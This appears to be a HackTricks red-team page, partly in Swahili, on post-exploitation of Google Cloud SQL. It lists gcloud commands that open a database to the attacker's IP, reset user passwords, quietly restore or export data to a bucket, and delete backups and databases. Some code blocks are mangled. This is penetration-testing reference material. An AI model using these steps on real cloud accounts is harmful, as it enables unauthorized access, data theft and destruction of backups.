GCP - Cloud SQL Post Exploitation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Cloud SQL

Kwa habari zaidi kuhusu Cloud SQL angalia:

GCP - Cloud SQL Enum

cloudsql.instances.update, ( cloudsql.instances.get)

To connect to the databases you unahitaji tu ufikiaji wa port ya database and know the username and password, there isn’t any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and kuruhusu anwani yako ya IP kuifikia.

Ruhusu IP yako na uungane na database ```bash # Use --assign-ip to make the database get a public IPv4 gcloud sql instances patch $INSTANCE_NAME \ --authorized-networks "$(curl ifconfig.me)" \ --assign-ip \ --quiet

mysql -h <ip_db> # If mysql

With cloudsql.instances.get you can use gcloud directly

gcloud sql connect mysql –user=root –quiet

</details>

Inawezekana pia kutumia **`--no-backup`** ku**haribu chelezo za hifadhidata**.

Kama hizi ndizo mahitaji, sina uhakika kabisa ni kwa ajili gani ruhusa **`cloudsql.instances.connect`** na **`cloudsql.instances.login`**. Ikiwa unajua, tuma PR!

### `cloudsql.users.list`

Pata **orodha ya watumiaji wote** wa hifadhidata:

<details>

<summary>Orodha ya watumiaji wa hifadhidata</summary>
```bash
gcloud sql users list --instance <intance-name>

cloudsql.users.create

Ruhusa hii inaruhusu kuunda mtumiaji mpya ndani ya hifadhidata:

Unda mtumiaji wa hifadhidata ```bash gcloud sql users create --instance --password ```

cloudsql.users.update

Ruhusa hii inaruhusu kusasisha mtumiaji ndani ya hifadhidata. Kwa mfano, unaweza kubadilisha nenosiri lake:

Sasisha nenosiri la mtumiaji ```bash gcloud sql users set-password --instance --password ```

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

Nakili za akiba zinaweza kuwa na taarifa nyeti za zamani, kwa hivyo inafaa kuzikagua.
Rejesha nakala ya akiba ndani ya hifadhidata:

Rejesha nakala ya hifadhidata ```bash gcloud sql backups restore --restore-instance ```

Ili kufanya hivyo kwa njia ya siri zaidi inashauriwa kuunda instance mpya ya SQL na kurejesha data hapo badala ya katika databases zinazotumika sasa.

cloudsql.backupRuns.delete

Ruhusa hii inaruhusu kufuta backups:

Futa backup ```bash gcloud sql backups delete --instance ```

cloudsql.instances.export, storage.objects.create

Hamisha hifadhidata kwenye Cloud Storage Bucket ili uweze kuifikia kutoka huko:

Hamisha hifadhidata kwenye bucket ```bash # Export sql format, it could also be csv and bak gcloud sql export sql --database ```

cloudsql.instances.import, storage.objects.get

Ingiza hifadhidata (kuandika juu) kutoka Cloud Storage Bucket:

Ingiza hifadhidata kutoka Cloud Storage Bucket ```bash # Import format SQL, you could also import formats bak and csv gcloud sql import sql ```

cloudsql.databases.delete

Futa database kutoka kwenye db instance:

Futa database ```bash gcloud sql databases delete --instance ```

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks